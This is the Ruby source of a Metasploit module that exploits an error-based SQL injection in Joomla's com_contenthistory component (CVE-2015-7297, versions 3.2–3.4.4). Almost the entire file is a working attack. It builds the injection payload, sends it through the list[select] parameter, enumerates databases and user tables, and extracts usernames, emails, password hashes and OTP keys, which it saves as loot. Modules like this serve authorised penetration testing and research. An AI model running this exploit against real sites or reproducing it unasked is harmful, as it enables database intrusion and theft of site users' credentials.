Joomla com_contenthistory Error-Based SQL Injection

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Joomla com_contenthistory Error-Based SQL Injection',
      'Description'    => %q{
        This module exploits a SQL injection vulnerability in Joomla versions 3.2
        through 3.4.4 in order to either enumerate usernames and password hashes.
      },
      'References'     =>
        [
          ['CVE', '2015-7297'],
          ['URL', 'https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/joomla-sql-injection-vulnerability-exploit-results-in-full-administrative-access/']
        ],
      'Author'         =>
        [
          'Asaf Orpani', # discovery
          'bperry',      # metasploit module
          'Nixawk'       # module review
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2015-10-22'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
      ])
  end

  def check
    flag = Rex::Text.rand_text_alpha(8)
    lmark = Rex::Text.rand_text_alpha(5)
    rmark = Rex::Text.rand_text_alpha(5)

    payload = 'AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT('
    payload << "0x#{lmark.unpack('H*')[0]},"
    payload << "(SELECT 0x#{flag.unpack('H*')[0]}),"
    payload << "0x#{rmark.unpack('H*')[0]},"
    payload << 'FLOOR(RAND(0)*2)'
    payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'

    res = sqli(payload)

    if res && res.code == 500 && res.body =~ /#{lmark}#{flag}#{rmark}/
      Msf::Exploit::CheckCode::Vulnerable
    else
      Msf::Exploit::CheckCode::Safe
    end
  end

  def request(query, payload, lmark, rmark)
    query = "#{payload}" % query
    res = sqli(query)

    # Error based SQL Injection
    if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
      $1
    end
  end

  def query_databases(payload, lmark, rmark)
    dbs = []

    query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
    query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'

    dbc = request(query, payload, lmark, rmark)

    query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
    query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'

    0.upto(dbc.to_i - 1) do |i|
      dbname = request(query_fmt % i, payload, lmark, rmark)
      dbs << dbname
      vprint_good(dbname)
    end

    %w(performance_schema information_schema mysql).each do |dbname|
      dbs.delete(dbname) if dbs.include?(dbname)
    end

    dbs
  end

  def query_tables(database, payload, lmark, rmark)
    tbs = []

    query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
    query << 'FROM INFORMATION_SCHEMA.TABLES '
    query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"

    tbc = request(query, payload, lmark, rmark)

    query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
    query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
    query_fmt << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}) "
    query_fmt << 'LIMIT %d,1)'

    vprint_status('tables in database: %s' % database)
    0.upto(tbc.to_i - 1) do |i|
      tbname = request(query_fmt % i, payload, lmark, rmark)
      vprint_good(tbname)
      tbs << tbname if tbname =~ /_users$/
    end

    tbs
  end

  def query_columns(database, table, payload, lmark, rmark)
    cols = []
    query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"

    colc = request(query, payload, lmark, rmark)
    vprint_status(colc)

    valid_cols = [   # joomla_users
      'activation',
      'block',
      'email',
      'id',
      'lastResetTime',
      'lastvisitDate',
      'name',
      'otep',
      'otpKey',
      'params',
      'password',
      'registerDate',
      'requireReset',
      'resetCount',
      'sendEmail',
      'username'
    ]

    query_fmt = '(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) '
    query_fmt << "FROM #{database}.#{table} ORDER BY id LIMIT %d,1)"

    0.upto(colc.to_i - 1) do |i|
      record = {}
      valid_cols.each do |col|
        l = 1
        record[col] = ''
        loop do
          value = request(query_fmt % [col, l, i], payload, lmark, rmark)
          break if value.blank?
          record[col] << value
          l += 54
        end
      end
      cols << record
      vprint_status(record.to_s)
    end

    cols
  end

  def run
    lmark = Rex::Text.rand_text_alpha(5)
    rmark = Rex::Text.rand_text_alpha(5)

    payload = 'AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
    payload << "0x#{lmark.unpack('H*')[0]},"
    payload << '%s,'
    payload << "0x#{rmark.unpack('H*')[0]},"
    payload << 'FLOOR(RAND(0)*2)'
    payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'

    dbs = query_databases(payload, lmark, rmark)
    dbs.each do |db|
      tables = query_tables(db, payload, lmark, rmark)
      tables.each do |table|
        cols = query_columns(db, table, payload, lmark, rmark)
        next if cols.blank?
        path = store_loot(
          'joomla.users',
          'text/plain',
          datastore['RHOST'],
          cols.to_json,
          'joomla.users')
        print_good('Saved file to: ' + path)
      end
    end
  end

  def sqli(payload)
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {
        'option' => 'com_contenthistory',
        'view' => 'history',
        'list[ordering]' => '',
        'item_id' => 1,
        'type_id' => 1,
        'list[select]' => '1 ' + payload
      }
    )
  end
end